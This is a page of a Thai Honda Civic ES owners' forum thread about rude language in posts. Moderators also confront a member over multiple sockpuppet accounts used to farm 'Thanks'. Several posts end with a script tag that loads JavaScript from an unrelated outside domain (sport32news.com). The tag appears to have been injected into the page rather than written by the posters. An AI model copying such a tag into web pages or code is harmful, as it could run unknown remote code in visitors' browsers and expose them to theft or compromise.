ตอบ
Love_CivicEs

เข้าร่วม: 21 มีนา 2012
ตอบ: 5

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 2
ให้คำขอบคุณ: 129
ศุกร์, 23 มีนา 2012 18:49 - คิดยังไงกับการใช้คำหยาบในกระทู้ ข้อความส่วนตัวใต้รูปส่วนตัว หรือ ลายเซ็นกันบ้างคะ
psYchosis พิมพ์ว่า:
asaweenarak พิมพ์ว่า:
ถ้อยคำนั้นจะ บ่งบอกถึงวุฒิภาวะ ความสามารถในการที่จะอยู่ในสังคมกับคนอื่น และพื้นฐานชีวิต ของคนที่ใช้ถ้อยคำนั้นๆ

หรือคุนไม่เคยใช้คำหยาบคำ ขอโทดนะคับที่พื้นฐานผมมันต่ำ (แต่ก้อมีกินมีใช้) ที่ผมใช้คำหยาบ ผมหมายถึงGooGrien ผมไม่ได้กล่่าวถึงทุกคน คุนโอ๋เองก้อมีลูกแล้วน่าจะแยกแยะอะไรๆเป็นอะไรได้ คนทำผิดไม่ได้แปลว่าจะทำผิดอีก กรุณาอย่าแอนตี้ผม เพราะผมก้อใช่ว่าจะอยากพิมคุยกับคุนเลย
ปล.ถ้าผมเป็นคุนที่ตอนนี้กำลังไม่ชอบผมสักเท่าไหร่ ผมจะไม่วิจารณ์ถึงพื้นฐานชีวิตของคนอื่นโดยที่ยังไม่ได้รู้จักเค้าคนนั้นเลยสักนิด
คนผิดถ้ารู้จักแก้เราก้อควรให้โอกาสไม่ใช่หรอ
และที่แล้วมาผมก้อต้องขอโทดทางเวปด้วยคับ ต่อไปนี้คงไม่มีเหตุการณ์แบบนี้อีกแล้วเพราะID GooGrien คนที่คอยก่อกวนโดยแบนไปแล้ว ขอบคุนทางเวปมากที่ดูแลให้

อ่านข้อความดีๆครับ
ผมไม่ได้ว่าใครครับ
ในความหมายของข้อความ คือ "ถ้อยคำ จะอธิบาย คนที่พูดได้ว่า มีนิสัยเป็นยังไง พื้นฐานชีวิตเป็นยังไง"
ส่วนจะดีหรือไม่ดี นั้นก็อยู่ที่ข้อความที่ใช้

ปกติผมก็พูดหยาบคาย ครับ เพราะผมมันก็คนธรรมดา แต่ผมจะเตือนตัวเองอยู่เสมอว่า อย่าใช้คำหยาบคายถ้าไม่จำเป็น หรือ เหลืออด ครับ

คนเรา การอยู่ในสังคม เราควรให้เกียรติซึ่งกันและกัน ผมก็พยายามให้ทุกคนในบอร์ดเหมือนกัน
ผมไม่เคยด่าเพื่อนในบอร์ดเลยแม้แต่คนเดียว ถึงแม้ว่าบางคนจะทำไม่ดีกับผม หลอกขายของไม่ดีให้ผมบ้าง หรือแม้การใช้ถ้อยคำพาดพิงภรรยาผมก็ตาม

โอเคครับ ถ้าจะแก้ไขตัวเองก็ให้ทำจริงๆ เถอะครับ คุณ ???
จะให้ผมเรียก ว่า คุณ Asaweenarak หรือ คุณ mugen หรือ คุณ prewa หรือ คุณ Love_CivicEs ดีครับ

ก้อแล้วแต่คุนจะเรียกเถอะ
asaweenarak

เข้าร่วม: 11 มกรา 2012
ตอบ: 10

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 3
ให้คำขอบคุณ: 151

ปี: 2004
ศุกร์, 23 มีนา 2012 19:00 - คิดยังไงกับการใช้คำหยาบในกระทู้ ข้อความส่วนตัวใต้รูปส่วนตัว หรือ ลายเซ็นกันบ้างคะ
Pluak_Ka พิมพ์ว่า:
นอกจากนี้นะคะ 3 user ข้างบนนั่นน่ะค่ะ ได้สมัครมาก่อนหน้านี้แล้วอีก 2 User คือ Praewa และ asaweenaruk (คล้าย asaweenarak แต่เปลี่ยนตัวสุดท้ายจาก "rak" เป็น "ruk")

แต่ได้โดน "แบน" ไป เพราะปั่น Thanks ดูตามรูปข้างล่างก็ได้ค่ะ ไม่เคยโพสข้อความอะไรเลย โพสแต่อีโมอย่างเดียว แล้วก็กด Thanks ให้กันไปมา แล้วก็เลยโดน "บล็อค user" ไป เมื่อวันที่ 11 มกราคม 2012 ดูได้จากกระทู้สุดท้ายที่โพส หลังจากนั้นก็โพสอะไรอีกไม่ได้

เป็นที่มาว่าทำไม mugen กับ asaweenarak จึงเริ่มใช้งานเมื่อ 11 มกราคม 2012 ก็เป็นเพราะว่าใช้งาน user ข้างต้นทั้ง 2 อันไม่ได้
ในวันนั้นนั่นเอง จึงจำเป็นต้องสมัครใหม่ในวันนั้นค่ะ

นู๋ PM แจ้งทาง Admin ไปแล้ว Admin แจ้งกลับมาว่าไม่ต้องเป็นห่วง เนื่องจากมีระบบการป้องกัน โดยมีหลักฐานซึ่งสามารถใช้ได้ตามกฎหมาย เพื่อยืนยันได้ว่าทั้ง 5 user นั้นเป็นคนๆเดียวกันค่ะ

ขอบคุณครับ ที่เป็นห่วงบอร์ด
ตอนนี้เราได้ข้อมูลการใช้งานบอร์ดของ ทั้งหมดไว้แล้ว กำลังจะประชุมผู้ดูแลบอร์ด อยู่ว่าจะเอายังดี
จะต้องแจ้งความไหม เพราะ เข้าข่ายผิด พรบ. คอมพิวเตอร์ ในเรื่องการปลอมแปลงตัวบุคคล เราก็อุตส่าออกมาตั้งกระทู้เตือนหลายครั้งแล้ว
แต่ก็ไม่เป็นผล

บอกตามตรงเลยนะผมตั้งใจใช้ชื่อให้คล้ายกับอันเก่าที่โดนแบนไป(ใครไม่รู้ก้อโง่ละ)
ส่วนใครจะสมัครวันไหนยังไงผมจะรู้ไหมว่า ณ วันนั้นก้อมีคนสมัครด้วยอ้าวแล้วทำไมไม่เหมารวม ไอดีGooGrienว่าเป็นผมด้วยละหรือเพราะไอดีGooGrienไม่ได้กดthankให้เลยไม่โดนเอี่ยวไปด้วย กรุณาอย่า2มาตรฐานคับ
ต่อไปนี้ก้อแล้วแต่ทางAdminละกันว่าจะปิดไอดีasaweenarakไหม ผมให้Adminตัดสิน (คุนเดือนร้อนแทนGooGrienหรือคับ)
Love_CivicEs

เข้าร่วม: 21 มีนา 2012
ตอบ: 5

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 2
ให้คำขอบคุณ: 129
ศุกร์, 23 มีนา 2012 19:07 - คิดยังไงกับการใช้คำหยาบในกระทู้ ข้อความส่วนตัวใต้รูปส่วนตัว หรือ ลายเซ็นกันบ้างคะ
มันอะไรกันหนักกันหนาเนี่ย ถ้าเป็นอย่างนี้Admin แบนไอดีนี้เลยก้อ
เรื่องมากจัง
asaweenarak

น้องใหม่
น้องใหม่

ศุกร์, 23 มีนา 2012 19:20 - คิดยังไงกับการใช้คำหยาบในกระทู้ ข้อความส่วนตัวใต้รูปส่วนตัว หรือ ลายเซ็นกันบ้างคะ
ถ้าคนที่เคยโดนแบบแล้วกลับมาตั้งชื่อคล้ายๆอันเก่าแล้วเป็นแบบนี้ ก้อถ้ายังคิดว่าผมจะกลับมาทำผิดอีกผมคงไม่ตั้งชื่อให้มันึล้ายกับอันเก่าหรอก คิดกันได้แค่นี้หรอ จะเล่นเวปแบบดีๆมั้งไม่ได้เลบหรือไง เบื่อๆๆๆ
งั้นAdminแบนผมเลยคับ เรื่องมากจัง คุนPluak_Ka กับคุนโอ๋จะได้สบายใจ
psYchosis

ชื่อเล่น: โอ๋

เข้าร่วม: 11 สิงหา 2008
ตอบ: 2535

Moderator
Moderator

ได้รับคำขอบคุณ: 9747
ให้คำขอบคุณ: 4367

ปี: 2003
ศุกร์, 23 มีนา 2012 19:22 - คิดยังไงกับการใช้คำหยาบในกระทู้ ข้อความส่วนตัวใต้รูปส่วนตัว หรือ ลายเซ็นกันบ้างคะ
asaweenarak พิมพ์ว่า:
Pluak_Ka พิมพ์ว่า:
นอกจากนี้นะคะ 3 user ข้างบนนั่นน่ะค่ะ ได้สมัครมาก่อนหน้านี้แล้วอีก 2 User คือ Praewa และ asaweenaruk (คล้าย asaweenarak แต่เปลี่ยนตัวสุดท้ายจาก "rak" เป็น "ruk")

แต่ได้โดน "แบน" ไป เพราะปั่น Thanks ดูตามรูปข้างล่างก็ได้ค่ะ ไม่เคยโพสข้อความอะไรเลย โพสแต่อีโมอย่างเดียว แล้วก็กด Thanks ให้กันไปมา แล้วก็เลยโดน "บล็อค user" ไป เมื่อวันที่ 11 มกราคม 2012 ดูได้จากกระทู้สุดท้ายที่โพส หลังจากนั้นก็โพสอะไรอีกไม่ได้

เป็นที่มาว่าทำไม mugen กับ asaweenarak จึงเริ่มใช้งานเมื่อ 11 มกราคม 2012 ก็เป็นเพราะว่าใช้งาน user ข้างต้นทั้ง 2 อันไม่ได้
ในวันนั้นนั่นเอง จึงจำเป็นต้องสมัครใหม่ในวันนั้นค่ะ

นู๋ PM แจ้งทาง Admin ไปแล้ว Admin แจ้งกลับมาว่าไม่ต้องเป็นห่วง เนื่องจากมีระบบการป้องกัน โดยมีหลักฐานซึ่งสามารถใช้ได้ตามกฎหมาย เพื่อยืนยันได้ว่าทั้ง 5 user นั้นเป็นคนๆเดียวกันค่ะ

ขอบคุณครับ ที่เป็นห่วงบอร์ด
ตอนนี้เราได้ข้อมูลการใช้งานบอร์ดของ ทั้งหมดไว้แล้ว กำลังจะประชุมผู้ดูแลบอร์ด อยู่ว่าจะเอายังดี
จะต้องแจ้งความไหม เพราะ เข้าข่ายผิด พรบ. คอมพิวเตอร์ ในเรื่องการปลอมแปลงตัวบุคคล เราก็อุตส่าออกมาตั้งกระทู้เตือนหลายครั้งแล้ว
แต่ก็ไม่เป็นผล

บอกตามตรงเลยนะผมตั้งใจใช้ชื่อให้คล้ายกับอันเก่าที่โดนแบนไป(ใครไม่รู้ก้อโง่ละ)
ส่วนใครจะสมัครวันไหนยังไงผมจะรู้ไหมว่า ณ วันนั้นก้อมีคนสมัครด้วยอ้าวแล้วทำไมไม่เหมารวม ไอดีGooGrienว่าเป็นผมด้วยละหรือเพราะไอดีGooGrienไม่ได้กดthankให้เลยไม่โดนเอี่ยวไปด้วย กรุณาอย่า2มาตรฐานคับ
ต่อไปนี้ก้อแล้วแต่ทางAdminละกันว่าจะปิดไอดีasaweenarakไหม ผมให้Adminตัดสิน (คุนเดือนร้อนแทนGooGrienหรือคับ)

น้องครับ อย่าพยายามเลยครับ พี่ขอร้องหละ พี่ไม่อยากให้ต้องถึงโรงถึงศาลกัน
บอร์ดเรา มีระบบที่สามารถบอกได้นะครับว่า เข้าจากเครื่องคอมพิวเตอร์เครื่องไหน จากที่ไหนในประเทศนี้ แม้กระทั่งในโลกนี้
ซึ่งที่ user ที่น้องโพส ไม่ว่า asaweenarak หรือ Love_CivicEs เพื่อจะพยายามว่า เป็น คนละคน นั้น ในระบบมันก็บอกว่า มาจากคนเดียวกัน

ผมไม้ได้เดือดร้อนแทนใครครับ แต่ผมเป็น Admin ที่ดูแลบอร์ด มันคือหน้าที่ของพวกผม
เราไม่มี 2 มาตรฐานครับ เรามีมาตรฐานเดียว คือ

มาตรฐาน Admin แต่ เราจะยึดความถูกต้อง

พี่ไม่อยากทะเลอะกับน้องนะครับ แต่เตือนด้วยความหวังดีจริงๆ
ได้รับคำขอบคุณจาก: PAE KUNG  A-u-T-o-N-o-m-Y  kaisuh  bank01  chang167  chengg  kittidech  mark_es03 
asaweenarak

น้องใหม่
น้องใหม่

ศุกร์, 23 มีนา 2012 19:35 - คิดยังไงกับการใช้คำหยาบในกระทู้ ข้อความส่วนตัวใต้รูปส่วนตัว หรือ ลายเซ็นกันบ้างคะ
ผมไม่ได้พยายามบอกว่าเป็นคนละคนคับเพราะผมก้อยอมรับในการตัดสินใจของAdminอยู่แล้วคับ และผมก้อไม่ได้อยากทะเลอะกับใคร

ขอบคุนในความหวังดีคับ
song

เข้าร่วม: 10 กุมภา 2011
ตอบ: 9833

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5558
ให้คำขอบคุณ: 4415

ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
ศุกร์, 23 มีนา 2012 19:47 - คิดยังไงกับการใช้คำหยาบในกระทู้ ข้อความส่วนตัวใต้รูปส่วนตัว หรือ ลายเซ็นกันบ้างคะ
มันเกิดอะไรขึ้นกับบ้านหลังนี้ของ พวกเราครับ
ได้รับคำขอบคุณจาก: asaweenarak  A-u-T-o-N-o-m-Y  tiktok  bank01  moonoy  mark_es03 
ES2.0

ชื่อเล่น: ปาล์ม

เข้าร่วม: 17 เมษา 2009
ตอบ: 1013

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1027
ให้คำขอบคุณ: 1000

สี: ทอง เดเสิร์ท มิสท์ (เมทัลลิก) (YP-538M)
ศุกร์, 23 มีนา 2012 20:36 - คิดยังไงกับการใช้คำหยาบในกระทู้ ข้อความส่วนตัวใต้รูปส่วนตัว หรือ ลายเซ็นกันบ้างคะ
เกิดอะไรขึ้นกับบ้านอีเอส ผมรุ้สึกว่าตั้งแต่ใช้ thx มาแลกสติกเกอร์ได้อะไรๆก็ดูเปลี่ยนไป
ได้รับคำขอบคุณจาก: asaweenarak  tiktok  bank01  chengg 
yuncup2008

เข้าร่วม: 05 พฤศจิกา 2008
ตอบ: 427

แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 420
ให้คำขอบคุณ: 68

ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
ศุกร์, 23 มีนา 2012 20:55 - คิดยังไงกับการใช้คำหยาบในกระทู้ ข้อความส่วนตัวใต้รูปส่วนตัว หรือ ลายเซ็นกันบ้างคะ
งานงอกแล้วสิ บ้านESเรา
ปล.อยู่บ้านหลังนี้มาก็5ปี ก็เพิ่งจะเจอก็วันนี้ เหนื่อยใจแทนAdmin
ได้รับคำขอบคุณจาก: A-u-T-o-N-o-m-Y  asaweenarak  mark_es03 
lordpark

ชื่อเล่น: ปาร์ค

เข้าร่วม: 16 กันยา 2011
ตอบ: 714

Guru ES
Guru ES

ได้รับคำขอบคุณ: 640
ให้คำขอบคุณ: 1517

สี: ดำ ไนท์ฮอว์ก (B-92P)
ศุกร์, 23 มีนา 2012 21:36 - คิดยังไงกับการใช้คำหยาบในกระทู้ ข้อความส่วนตัวใต้รูปส่วนตัว หรือ ลายเซ็นกันบ้างคะ
เอิ่ม... คำว่า "คุณโอ๋เองก้อมีลูกแล้วน่าจะแยกแยะอะไรๆเป็นอะไรได้" มันแรงไปไหมครับ? และเป็นเรื่องส่วนตัวของพี่เขาด้วย ไม่น่าพาดพิงเลยนะครับ ปล.ผมเพิ่งเล่นเว็บนี้ไม่นานอ่าครับ "<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: psYchosis  tumrider  bank01  mark_es03 
asaweenarak

น้องใหม่
น้องใหม่

ศุกร์, 23 มีนา 2012 23:02 - คิดยังไงกับการใช้คำหยาบในกระทู้ ข้อความส่วนตัวใต้รูปส่วนตัว หรือ ลายเซ็นกันบ้างคะ
LordPark พิมพ์ว่า:
เอิ่ม... คำว่า "คุณโอ๋เองก้อมีลูกแล้วน่าจะแยกแยะอะไรๆเป็นอะไรได้" มันแรงไปไหมครับ? และเป็นเรื่องส่วนตัวของพี่เขาด้วย ไม่น่าพาดพิงเลยนะครับ ปล.ผมเพิ่งเล่นเว็บนี้ไม่นานอ่าครับ "<script src="https://sport32news.com/civicesgroup.js">

ผมว่าไม่แรงนะคับเพราะไอ้คำว่า(พื้นฐานชีวิต) นั้นก้อกล่าวถึงครอบครัวผมเลยนะคับ
PAE KUNG

ชื่อเล่น: เป้

เข้าร่วม: 08 ตุลา 2008
ตอบ: 1131

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2818
ให้คำขอบคุณ: 3696

สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
ศุกร์, 23 มีนา 2012 23:23 - คิดยังไงกับการใช้คำหยาบในกระทู้ ข้อความส่วนตัวใต้รูปส่วนตัว หรือ ลายเซ็นกันบ้างคะ
55555พี่ต้นมีคนอยากเจอพี่ต้นอ่ะ^______^
ได้รับคำขอบคุณจาก: asaweenarak  hacker  chengg  mark_es03 
zan

เข้าร่วม: 23 สิงหา 2009
ตอบ: 3145

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3432
ให้คำขอบคุณ: 6687

เสาร์, 24 มีนา 2012 08:07 - คิดยังไงกับการใช้คำหยาบในกระทู้ ข้อความส่วนตัวใต้รูปส่วนตัว หรือ ลายเซ็นกันบ้างคะ
ขี้เกียจคิด
คุยกับ Immo ผมไปก่อนละกัน

ได้รับคำขอบคุณจาก: asaweenarak  tiktok  bank01  mark_es03 
koobe

ชื่อเล่น: นัท

เข้าร่วม: 19 มิถุนา 2010
ตอบ: 2462

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3437
ให้คำขอบคุณ: 2482

สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
เสาร์, 24 มีนา 2012 08:40 - คิดยังไงกับการใช้คำหยาบในกระทู้ ข้อความส่วนตัวใต้รูปส่วนตัว หรือ ลายเซ็นกันบ้างคะ
zan พิมพ์ว่า:
ขี้เกียจคิด
คุยกับ Immo ผมไปก่อนละกัน

มีไร//กันเหรอครับพี่ๆ จริงจังกันขนาดนั้นเลยเหรอ ถ้าเราจะอยู่ในสังคมเขา ก็ต้องปฎิบัติตามกฎ ระเบียบทีบ้านเขาตั้งไว้นะครับ
ได้รับคำขอบคุณจาก: asaweenarak  tiktok  bank01 
aum1977

ชื่อเล่น: อ้ำ

เข้าร่วม: 04 เมษา 2010
ตอบ: 84

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 59
ให้คำขอบคุณ: 2

สี: ทอง แซทเทิลไลท์ (NH-663M)
เสาร์, 24 มีนา 2012 09:10 - คิดยังไงกับการใช้คำหยาบในกระทู้ ข้อความส่วนตัวใต้รูปส่วนตัว หรือ ลายเซ็นกันบ้างคะ
เอาให้พอประมาณนะครับ
ได้รับคำขอบคุณจาก: asaweenarak 
Shoke

ชื่อเล่น: โช้คอัพ

เข้าร่วม: 31 กรกฎา 2008
ตอบ: 1444

Administrator
Administrator

ได้รับคำขอบคุณ: 6862
ให้คำขอบคุณ: 2301

ปี: 2005
สี: ขาว ทาฟเฟต้า (NH-578)
เสาร์, 24 มีนา 2012 09:33 - คิดยังไงกับการใช้คำหยาบในกระทู้ ข้อความส่วนตัวใต้รูปส่วนตัว หรือ ลายเซ็นกันบ้างคะ
หน้าสมัครสมาชิก

Attached File :
คิดยังไงกับการใช้คำหยาบในกระทู้ ข้อความส่วนตัวใต้รูปส่วนตัว หรือ ลายเซ็นกันบ้างคะ
ได้รับคำขอบคุณจาก: asaweenarak  hacker  battery3k  kaisuh  honeybeex7  tiktok  underhill  boyboom_16  tumrider  bank01  chengg  kittidech  mark_es03 
Atombome

เข้าร่วม: 29 สิงหา 2010
ตอบ: 37

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 34
ให้คำขอบคุณ: 5

เสาร์, 24 มีนา 2012 09:36 - คิดยังไงกับการใช้คำหยาบในกระทู้ ข้อความส่วนตัวใต้รูปส่วนตัว หรือ ลายเซ็นกันบ้างคะ
ปูเสื่อนั่งจิบเบียร์รอดูตอนจบ...
ได้รับคำขอบคุณจาก: asaweenarak 
took

เข้าร่วม: 08 ธันวา 2011
ตอบ: 941

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 607
ให้คำขอบคุณ: 42

เสาร์, 24 มีนา 2012 20:56 - คิดยังไงกับการใช้คำหยาบในกระทู้ ข้อความส่วนตัวใต้รูปส่วนตัว หรือ ลายเซ็นกันบ้างคะ
หมดคำพูด
K_series

เข้าร่วม: 01 ตุลา 2008
ตอบ: 3032

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 22059
ให้คำขอบคุณ: 6045
จันทร์, 26 มีนา 2012 20:25 - คิดยังไงกับการใช้คำหยาบในกระทู้ ข้อความส่วนตัวใต้รูปส่วนตัว หรือ ลายเซ็นกันบ้างคะ
ไหนๆคุณAsaweenarak หรือ คุณ mugen หรือ คุณ prewa หรือ คุณ Love_CivicEs ก้อแล้วแต่เถอะนะครับ

เท่าที่อ่านก้อคือคุณยอมรับว่ามีหลายLogin แต่เพื่อการใดนั้นผมคงไม่ขอพูดถึงเพราะในตอนนี้ไม่อยู่ในหน้าที่ของผม

แต่ผมอยากจะแนะนำว่า ก้อเลือกเอาซักล็อกอินนึงก้อแล้วกันครับ

ถ้าอยากจะสละล็อกอินชื่อไหนสามารถแจ้งมาได้ครับผู้ดูแลจะทำการลบล็อกอินนั้นๆให้ (ผมไม่แน่ใจว่าลบเองได้ไหม)

ทั้งนี้เพื่อความบริสุทธิ์ใจด้วยครับ ถ้าคุณบอกว่าต่อไปจะไม่ทำผิดกติกาของบ้านหลังนี้อีกผมเชื่อครับว่าทุกๆคนก้อไม่ติดใจอะไรครับ

อีกอย่างพอถึงตอนขอสติ๊กเกอร์ผมจะตัดสินใจยากมากครับ ในกรณีแบบนี้
ได้รับคำขอบคุณจาก: psYchosis  Shoke  battery3k  PAE KUNG  kaisuh  honeybeex7  tiktok  underhill  boyboom_16  bank01  mugen  chengg  kittidech  monkey-es  mark_es03 
~ สเตฟาน ~

ชื่อเล่น: สเตฟาน

เข้าร่วม: 01 ตุลา 2008
ตอบ: 2023

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 7729
ให้คำขอบคุณ: 4939

สี: ขาว ทาฟเฟต้า (NH-578)
อังคาร, 27 มีนา 2012 12:03 - คิดยังไงกับการใช้คำหยาบในกระทู้ ข้อความส่วนตัวใต้รูปส่วนตัว หรือ ลายเซ็นกันบ้างคะ
ถึง สมาชิกทุกท่าน

ผมขอพูดในฐานะ ประธาน ขอเน้นนะ ในฐานะประธาน

ผมให้อำนาจเด็ดขาดกับคณะทำงานทุกคน Adminทุกคน เพื่อที่จะดูแลสังคมแห่งนี้ให้สงบสุขและเรียบร้อย

ถ้าสมาชิกบางคน..มาทำอะไรก็แล้วแต่ให้เกิดความวุ่นวาย ไม่ทำตามกฏ ผมและคณะทำงานทุกคนถือว่าคุณมาด้วยความไม่ประสงค์ดี จึงจักต้องมีมาตรการที่จะตักเตือน แบน หรือใดๆที่พึ่งจักทำได้

และที่ทำ มิได้ทำด้วยอารมณ์ แต่ทุกอย่างมีหลักฐาน ขอให้เข้าใจการดูแลคนหมู่มากด้วยนะครับ

และถ้าคณะกรรมการ หรือ Admin ท่านใดได้กระทำการใดๆลงไปแล้ว แล้วทำให้สมาชิกบางท่านไม่ชอบใจ โปรดติดต่อผมได้โดยตรง ผมรับผิดชอบเองครับ

...แต่ถ้าให้ผมพูดในฐานะสมาชิกธรรมดาๆคนนึง คนที่เข้ามาป่วน มามีหลายID คงได้ฟัดกับผมไปหลายรอบแล้วหละ
ปรับเปลี่ยนพฤติกรรมเพื่อมาอยู่ในสังคมเดียวกันอย่างมีความสุขดีกว่านะ เชื่อซิ
ได้รับคำขอบคุณจาก: koyakuza  tiktok  underhill  boyboom_16  battery3k  prodrive  bank01  K_series  PAE KUNG  mugen  chengg  kittidech  mark_es03 
วุฒิชัย

ชื่อเล่น: ตั้ม

เข้าร่วม: 26 มิถุนา 2011
ตอบ: 4151

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3281
ให้คำขอบคุณ: 4338

อังคาร, 27 มีนา 2012 19:14 - คิดยังไงกับการใช้คำหยาบในกระทู้ ข้อความส่วนตัวใต้รูปส่วนตัว หรือ ลายเซ็นกันบ้างคะ
ก็อาจจะสนิทแล้วก็เจอกันบ่อยอ่ะครับ

ลายเชนมีไว้เท่ๆๆดีกว่าครับ
tumrider

ชื่อเล่น: ตั้ม

เข้าร่วม: 18 กุมภา 2011
ตอบ: 816

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1109
ให้คำขอบคุณ: 1731

สี: เทา ซิลเวอร์สโตน (NH-630M)
อังคาร, 27 มีนา 2012 20:47 - คิดยังไงกับการใช้คำหยาบในกระทู้ ข้อความส่วนตัวใต้รูปส่วนตัว หรือ ลายเซ็นกันบ้างคะ
บ้านหลังนี้มีไว้สำหรับทุกคนที่อยากแบ่งปั่น-แลกเปลี่ยนความรู้หรือข้อมูลดีๆนะครับ

หากกระทู้ท่านใดๆที่มาเพื่อปว่นหรือไรก็ตามแต่ผมว่าไม่ควรอย่างยิ่งครับ(รกบ้านและเสียเวลาอ่านครับ)ขอบคุณ
bomb3092

ชื่อเล่น: บอม

เข้าร่วม: 13 ตุลา 2011
ตอบ: 1116

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 957
ให้คำขอบคุณ: 1379

อังคาร, 27 มีนา 2012 21:04 - คิดยังไงกับการใช้คำหยาบในกระทู้ ข้อความส่วนตัวใต้รูปส่วนตัว หรือ ลายเซ็นกันบ้างคะ
ถ้อยคำ จะอธิบาย คนที่พูดได้ว่า มีนิสัยเป็นยังไง พื้นฐานชีวิตเป็นยังไง

moonoy

เข้าร่วม: 19 กรกฎา 2009
ตอบ: 1153

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1364
ให้คำขอบคุณ: 926

พุธ, 28 มีนา 2012 00:45 - คิดยังไงกับการใช้คำหยาบในกระทู้ ข้อความส่วนตัวใต้รูปส่วนตัว หรือ ลายเซ็นกันบ้างคะ
เพื่อ ? Thanks เหรอ ? ไม่เข้าใจ ?
chang167

ชื่อเล่น: แก้ว

เข้าร่วม: 13 มิถุนา 2010
ตอบ: 150

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 149
ให้คำขอบคุณ: 82

พุธ, 28 มีนา 2012 09:34 - คิดยังไงกับการใช้คำหยาบในกระทู้ ข้อความส่วนตัวใต้รูปส่วนตัว หรือ ลายเซ็นกันบ้างคะ
สงสัยเค้าคงลืมไปว่า เล่นจากคอม เครื่องเดียวกัน เล่นจากเน็ท ไอพีเดียวกัน ป่านนี้ admin กับ staff นั้งฮาในความเกรียนของ มาน แล้ว ฮ่าๆ
Alert

ชื่อเล่น: เลิ๊ด

เข้าร่วม: 20 สิงหา 2008
ตอบ: 618

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1516
ให้คำขอบคุณ: 70

พุธ, 28 มีนา 2012 23:33 - คิดยังไงกับการใช้คำหยาบในกระทู้ ข้อความส่วนตัวใต้รูปส่วนตัว หรือ ลายเซ็นกันบ้างคะ
ทางคลับคงจะต้องหามาตรการในการแก้ไขในเร็ววันนี้ครับ

ขอให้สมาชิคทุกท่านช่วยเป็นหูเป็นตาให้ทีมงานด้วยนะครับ

ขอบคุณทุกกำลังใจและแจ้งเตือนมาทางเมลล์อ่านละหายเหนื่อยขึ้นเยอะเลย
ได้รับคำขอบคุณจาก: chengg  mark_es03  battery3k 
siripong

เข้าร่วม: 02 กรกฎา 2009
ตอบ: 3024

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 930
ให้คำขอบคุณ: 3457

พฤหัส, 29 มีนา 2012 06:30 - คิดยังไงกับการใช้คำหยาบในกระทู้ ข้อความส่วนตัวใต้รูปส่วนตัว หรือ ลายเซ็นกันบ้างคะ
พองามก็พอครับ หลายคนหลายความคิดครับ
พื้นที่สาธารณะไม่ควรอยู่แล้วครับ ดูแรงไปนิดครับ
อ่านแล้วก็ดูไม่ดีครับ 
tatumz

เข้าร่วม: 30 กรกฎา 2009
ตอบ: 728

Guru ES
Guru ES

ได้รับคำขอบคุณ: 639
ให้คำขอบคุณ: 494

พฤหัส, 29 มีนา 2012 07:48 - คิดยังไงกับการใช้คำหยาบในกระทู้ ข้อความส่วนตัวใต้รูปส่วนตัว หรือ ลายเซ็นกันบ้างคะ
 จบซ๊ะที
Over_Boost

เข้าร่วม: 28 ตุลา 2011
ตอบ: 596

ได้รับคำขอบคุณ: 715
ให้คำขอบคุณ: 592

สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
เสาร์, 31 มีนา 2012 02:23 - คิดยังไงกับการใช้คำหยาบในกระทู้ ข้อความส่วนตัวใต้รูปส่วนตัว หรือ ลายเซ็นกันบ้างคะ
ตอนนี้ปิดเทอมครับ

-*-
ได้รับคำขอบคุณจาก: mark_es03 
underhill

เข้าร่วม: 15 กันยา 2011
ตอบ: 3545

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 4125
ให้คำขอบคุณ: 1677

สี: น้ำเงิน อิเทอนอล (B-96P)
เสาร์, 31 มีนา 2012 08:59 - คิดยังไงกับการใช้คำหยาบในกระทู้ ข้อความส่วนตัวใต้รูปส่วนตัว หรือ ลายเซ็นกันบ้างคะ
Over_Boost พิมพ์ว่า:
ตอนนี้ปิดเทอมครับ

-*-

เน็ตอืด เพราะหัวเกรียนนั่งโหลดบิท <script src="https://sport32news.com/civicesgroup.js"></
ตอบ
หน้า 2 จาก 3
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.